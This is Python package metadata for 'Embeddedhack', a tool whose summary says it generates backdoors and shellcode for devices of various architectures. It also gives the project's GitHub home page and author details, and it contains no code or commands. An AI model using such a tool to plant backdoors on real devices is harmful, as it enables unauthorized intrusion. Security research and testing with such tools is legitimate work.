Metadata-Version: 2.1
Name: Embeddedhack
Version: 0.0.2
Summary: This tool is used for backdoor and shellcode generation for various architecture devices
Home-page: https://github.com/doudoudedi/hackEmbedded
Author: doudoudedi
Author-email: doudoudedi233@gmail.com
License: MIT
Platform: UNKNOWN
